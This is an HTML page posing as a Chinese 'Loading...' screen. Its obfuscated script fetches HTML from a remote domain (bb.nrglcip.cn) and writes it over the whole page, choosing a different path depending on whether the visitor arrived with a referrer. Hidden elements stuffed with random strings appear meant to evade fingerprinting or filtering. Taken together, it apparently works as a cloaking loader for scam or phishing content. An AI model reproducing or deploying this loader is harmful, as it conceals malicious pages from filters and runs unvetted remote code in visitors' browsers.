<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .nuFNa8oBh7 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .nuFNa8oBh7 .rJMF11vr1e {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .nuFNa8oBh7 .content {
            line-height: 50px;
            text-align: center
        }

        .nuFNa8oBh7 .img {
            width: 100%
        }

        .nuFNa8oBh7 .z0DICTW {
            text-align: center
        }

        .nuFNa8oBh7 .z0DICTW span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .nuFNa8oBh7 .z0DICTW span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .nuFNa8oBh7 .z0DICTW span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .nuFNa8oBh7 .z0DICTW span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .nuFNa8oBh7 .z0DICTW span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .nuFNa8oBh7 .z0DICTW span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .nuFNa8oBh7 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function mCCawLrraHJ(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var pa0BF1c = mCCawLrraHJ('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ pa0BF1c +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ pa0BF1c +".html?a=share";
		}
		
        jWoYVx=url+"#"+new Date().getTime();
        jWoYVx && function() {
            $.get(jWoYVx, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<ul style='display:none' >YqyAyQOEoErLYs8r7ns10uQ5SpCj8dYa3R</ul>
<b style='display:none' >WlInlkqTLouukjqcwDV6EziELXRDN7F4SbIRloN5QkYfToVof8cfMkMNNhF</b>
<li style='display:none' >YOaEn7kSpRPmzD0sO9geGuVpcJ3bwKgMzjhCWOMmOG</li>
<ul style='display:none' >YqyAyQOEoErLYs8r7ns10uQ5SpCj8dYa3R</ul>
<img  src='' style='display:none'>
<img  src='' style='display:none'>
<p  style='display:none'>cPunIodiiVbgv7sRZUWkU0cNjqNz6np13kIesg1UYkqpr8FG7oQQsJFTSFYKucLWS4YNoaw2jjd0o</p>
<li style='display:none' >YOaEn7kSpRPmzD0sO9geGuVpcJ3bwKgMzjhCWOMmOG</li>
<li style='display:none' >YOaEn7kSpRPmzD0sO9geGuVpcJ3bwKgMzjhCWOMmOG</li><div class="nuFNa8oBh7">
    <div class="rJMF11vr1e">
        <div class="z0DICTW">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>wrJA9lA7x2pOij03szAhFdkUNCCNfkeodw52Uvju2pPNORS76BassOYyXjv60VtNxT8hr390fhXVPp4nFFeNELLAgJqedy3M</p>
<ul style='display:none' >hGF1z4R5ZljfE54sKHGIuF17e5DZ400g3ZUIXuG3Q5KS4wXwC5x0XdEzzmQGd7G9rIsjfmhSJQnC</ul>
<p  style='display:none'>wrJA9lA7x2pOij03szAhFdkUNCCNfkeodw52Uvju2pPNORS76BassOYyXjv60VtNxT8hr390fhXVPp4nFFeNELLAgJqedy3M</p>
<h1 style='display:none' >RhZRsIsYZNqWoCCML9AKVVZEqIygo0C9jAbs9pKJHEmpuDuVDMfufnc6MeRTDqhDZJv8lLTcCHxdASm23FYMCelgqJZ1KJxEG</h1>
<span style='display:none'>iOdGjJNY4Af68j</span>
<ul style='display:none' >hGF1z4R5ZljfE54sKHGIuF17e5DZ400g3ZUIXuG3Q5KS4wXwC5x0XdEzzmQGd7G9rIsjfmhSJQnC</ul>
<div style='display:none'>LP5UWNHg1pwAJDksMD6ZqzKuQurM7GEUVjNu0jqQ</div>
<li style='display:none' >BisqvFcnzBc5D</li>
<span style='display:none'>iOdGjJNY4Af68j</span></body>
</html>